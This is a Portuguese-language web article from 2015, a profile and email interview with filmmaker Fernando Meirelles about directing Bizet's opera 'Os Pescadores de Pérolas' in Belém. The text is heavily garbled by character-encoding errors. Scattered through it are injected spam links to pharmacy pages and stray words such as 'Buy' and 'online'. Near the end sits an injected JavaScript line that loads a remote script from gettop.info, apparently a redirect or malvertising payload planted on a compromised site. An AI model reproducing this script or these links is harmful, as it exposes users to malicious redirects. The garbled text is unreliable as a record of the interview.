Escrito por em 21 ago 2015 nas áreas Cinema, Entrevista, Festival, Lateral, Ópera, Pará

Em entrevista exclusiva ao Movimento.com, o renomadoA�cineasta Fernando Meirelles conta sobre sua nova empreitada: a direA�A?o de Os Pescadores de PA�rolas, que integra a programaA�A?o do Festival de A�pera do Theatro da Paz.

 

Fernando Meirelles estA? longe de ser um iniciante. Mesmo assim, esse paulistano de 59A�anos de idade, dono de uma premiada carreira como cineasta, vai realizar, em setembro, mais uma estreia: a no mundo da A?pera. Ele A� o diretor de Os Pescadores de PA�rolas, obra de Georges Bizet (1838-1875) que serA? apresentada nos dias 9, 11, 13 e 15 do mA?s que vem em BelA�m do ParA?, como parte do Festival de A�pera do Theatro da Paz.

O mundo audiovisual faz parte de sua vida desde os 12 anos de idade, quando ganhou uma filmadora de seu pai. A primeira opA�A?o profissional foi Arquitetura, mas atA� o projeto de graduaA�A?o na Faculdade de Arquitetura e Urbanismo na USP foi um vA�deo. Ele desistiu da prancheta, mas nA?o das lentes. Na dA�cada de 1980, fundou, com os amigos Paulo Morelli, Marcelo Machado, DA?rio Vizeu e Beto Salatini), a produtora Olhar EletrA?nico, que, poucos anos depois, deu espaA�o A� empresa de propaganda O2 Filmes. Uma dA�cada foi o suficiente para que Meirelles se tornasse um importante e dos mais procurados produtores publicitA?rios do paA�s.

Mas o verdadeiro boom veio em 2002, com o longa-metragem Cidade de Deus, baseado no romance de Paulo Lins e codirigido por KA?tia Lund. O filme recebeu quatro indicaA�A�es ao Oscar, nas categorias de melhor diretor, melhor roteiro adaptado (BrA?ulio Mantovani), melhor ediA�A?o (Daniel Rezende) e melhor fotografia (Cesar Charlone), alA�m de ter sido exibido fora de competiA�A?o no Festival de Cannes e de integrar, na 66A? posiA�A?o, a lista 100 melhores filmes da dA�cada segundo o The Times.

A carreira internacional deslanchou. Em 2005, Meirelles dirigiu seu primeiro filme em lA�ngua inglesa a�� O Jardineiro Fiel (The Constant Gardner, baseado em romance de John Le CarrA�), estrelado por Ralph Fiennes e Rachel Weisz. O filme foi selecionado para os Festivais de Veneza e Cannes (com nomeaA�A�es a melhor realizador, argumento adaptado, fotografia e montagem) e Rachel Weisz ganhou o Oscar de melhor atriz coadjuvante. Depois vieram Ensaio sobre a Cegueira (em 2008, baseado em romance de JosA� Saramago) e 360 (em 2012, com Anthony Hopkins, Jude Law e Rachel Weisz).

Este ano, foram ao ar suas primeiras incursA�es na TV aberta. Meirelles dirigiu, ao lado do filho Quico Meirelles, a sA�rie Os Experientes, com um elenco de veteranos como Beatriz Segall, Selma Egrei, Joana Fomm, Lima Duarte e Juca de Oliveira. E, por meio da O2, produziu tambA�m para a Globo, o remake de um seriado dos anos 1980: Quem Ama nA?o Mata, agora rebatizado de Felizes para Sempre?, escrito pelo mesmo autor, Euclydes Marinho, e estrelado por Maria Fernanda CA?ndido, Enrique DA�az e Paola Oliveira.

Em meio a tantas novidades, o inusitado convite para dirigir Os Pescadores de PA�rolas, A?pera composta por Georges Bizet aos 25 anos. “Um convite feito por engano para alguA�m que aceitou por irresponsabilidade”, brincou, em entrevista ao site G1. O espetA?culo terA? direA�A?o musical e regA?ncia do maestro Miguel Campos Neto e serA? estrelada por Fernando Portari (tenor, o pescador Nadir), Camila Titinger (soprano, Leila, sacerdotisa de Brahma), Leonardo Neiva (barA�tono, como Zurga, chefe dos pescadores) e Andrey Mira (baixo, alto sacerdote). O corpo tA�cnico A� formado pelo cenA?grafo CA?ssio Amarantes, que criou cenA?rios a base de buriti; o iluminador Joyce Drummond, que tambA�m fez a luz da recente encenaA�A?o da A?pera A Ceia dos Cardeais (leia crA�tica aqui); a figurinista VerA?nica Julian, o diretor assistente Danilo Gambinni, alA�m dos diretores artA�sticos do Festival, Gilberto Chaves e Mauro Wrona. Para quem quiser saber as novidades do espetA?culo em primeira mA?o, Meirelles profere a palestra O cineasta que caiu na A?pera no dia 14 de setembro, A�s 18h30, no Theatro da Paz, com entrada franca.

Croqui do cenA?rio de "Os Pescadores de PA�rolas"

Croqui do cenA?rio de “Os Pescadores de PA�rolas”

 

Mas quem estA? acostumado a ver os trabalhos de Fernando Meirelles no cinema nA?o precisa reclamar: a A?ltima rA�cita serA? transmitida ao vivo, via satA�lite, para cinemas de oito cidades brasileiras, graA�as A� parceria da Cinelive com a O2 Play, distribuidora da O2 Filmes, produtora do cineasta. A prA�-venda dos ingressos comeA�ou no dia 13 de agosto no site da Cinelive. As novidades nA?o param por aA�: a transmissA?o de Os Pescadores de PA�rolas deve ser oferecida em sistema de video on demand Purchase em novembro e os bastidores da produA�A?o irA?o render um documentA?rio dirigido por Carlos NaderA�para o canal a caboA�HBO.

Em meio aos trabalhos e A� ansiedade da estreia, Fernando Meirelles conversou por e-mail com o Movimento.com. Confira.

* * * *

Movimento.com a�� O que o levou a aceitar esse “convite feito por engano” para dirigir Os Pescadores de PA�rolas em BelA�m?

Fernando Meirelles a�� Claro que este “por engano” foi uma piada. O Paulo Chaves, secretA?rio de Cultura do ParA?, costuma fazer apostas que, em sua maioria, dA?o muito certo. Ele achou que eu saberia contar uma histA?ria no palco e que isso me interessaria. Nem eu imaginava que me interessaria, mas mergulhei de cabeA�a.

 

Movimento.com a�� No primeiro teaser divulgado desta produA�A?o http://ccic.yuntech.edu.tw/?p=9383 , os cantores Fernando Portari e Leonardo Neiva estA?o cantando no chuveiro a�� imagem bastante simbA?lica para falar de A?pera. O que o mundo lA�rico significa para vocA?? Conte-nos um pouco sobre sua relaA�A?o com esse planeta de vozes empostadas (antes e depois deste trabalho).

Fernando Meirelles a�� online OuA�o pouca mA?sica lA�rica e conhecia pouco a A?pera. Claro que as clA?ssicas eu conhecia, mas nunca vi uma montagem de AA�da ou de Madame Butterfly, por exemplo. Depois que comecei a ouvir PescadoresA�para entendA?-la e ir pegando os tempos, a mA?sica e o canto foram entrando no sistema. Agora tenho ouvido A?pera ou canto lA�rico no carro, jA? fui assistir a trA?s montagens nestes A?ltimos dois meses. Percebi que A� uma questA?o de cultura. Se vocA? nA?o conhece, nA?o consegue gostar muito e, se comeA�a a entrar mais fundo, comeA�a a apreciar mais intensamente. Isso vale para qualquer coisa: para comida, vinho, artes plA?sticas e atA� para sexo. Creio.

 

online

 

Movimento.com a�� VocA? contou que transformou o libreto da A?pera em um roteiro. AlA�m dessa questA?o, quais as principais diferenA�as entre um set de filmagem e o palco de um teatro lA�rico?

Fernando Meirelles a�� Os ensaios comeA�am na segunda feira dia 17, aA� saberei quais sA?o as diferenA�as. Por sorte tenho um assistente, o Danilo Gambini, que tem mais experiA?ncia que eu, vou contar muito com a sua ajuda. O Gilberto Chaves, que dirige o Theatro da Paz, conhece A?peras como ninguA�m, ele vai ser meu consultor, queira ou nA?o queira.

 

Movimento.com a�� Que experiA?ncias vocA? pretende trazer de sua carreira no cinema para a direA�A?o de uma A?pera?

Fernando Meirelles a�� HA? alguns momentos que serA?o projetados, mas, fora isso, acho que a divisA?o por cenas que fiz se assemelha um pouco ao cinema. Minha grande dificuldade A� saber se teremos uma imagem com algum impacto ou beleza. No cinema sei onde estou pisando e tenho a montagem para me salvar, no palco nA?o. A inexperiA?ncia aqui me deixa muito inseguro.

 

Movimento.com a�� As transmissA�es de A?pera nos cinemas tA?m se tornado constantes no mundo e tambA�m no Brasil. A A?ltima rA�cita de Pescadores, inclusive, tambA�m serA? transmitida na tela grande. VocA? vA? o cinema como um veA�culo que pode ajudar a popularizar a A?pera?

Fernando Meirelles a�� A princA�pio poderia popularizar, pois fica mais fA?cil assistir montagens diferentes, mas neste caso, mais do que popularizar a A?pera, acho que a exibiA�A?o em cinemas vale como uma demonstraA�A?o de bom uso de dinheiro pA?blico. Ao ser exibida em 22 salas pelo Brasil, o investimento na montagem A� democratizado e, se tudo der certo, o teatro ainda recebe por isso.

 

Movimento.com a�� VocA? foi um dos cineastas brasileiros que ganhou grande reconhecimento internacional. Hoje hA? outros profissionais nacionais conquistando espaA�os fora do Brasil, como JosA� Padilha (Tropa de Elite, http://tammam.mhs.narotama.ac.id/2018/02/02/order-prandin-2mg/ Robocop), Karim AA?nouz (Praia do Futuro), Kleber MendonA�a Filho (O Som aoA�Redor) e Anna Muylaert (Que Horas Ela Volta?). Nosso cinema estA? bem na fita? Em que cineastas vocA? sugere que fiquemos atentos?

Fernando Meirelles a�� Na fita internacional acho que sempre pode aparecer um diretor ou outro, mas serA?o sempre casos isolados, mesmo assim A� bacana termos essas vozes pelo mundo. HA? uma nova geraA�A?o de diretores e roteiristas surgindo, que prometem grandes filmes nos prA?ximos 5 ou 10 anos. Quem me vem A� cabeA�a agora hora A� o pernambucano Gabriel Mascaro, que teve o seu Boi Neon em Veneza e estA? indo para Toronto. Assisti ao filme no comeA�o do ano e fiquei muito impressionado. A Petra Costa, que havia dirigido o lindo Elena, estA? lanA�ando seu segundo longa, Olmo e a Gaivota. Temos de ficar de olho nela. A Daniela Thomas, nA?o tA?o nova, acabou de rodar Vazante, em Minas. Vi umas imagens e ajoelhei. Preparem-se, pois aA� vem.

    Buy

  • Colaborou Leonardo Marques

http://www.lauralouenterprise.com/2018/02/01/cheap-diarex-milling/

diovan valsartan 40mg Confira a programaA�A?o completa do Festival de A�pera do Theatro da Paz

document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Faça seu comentário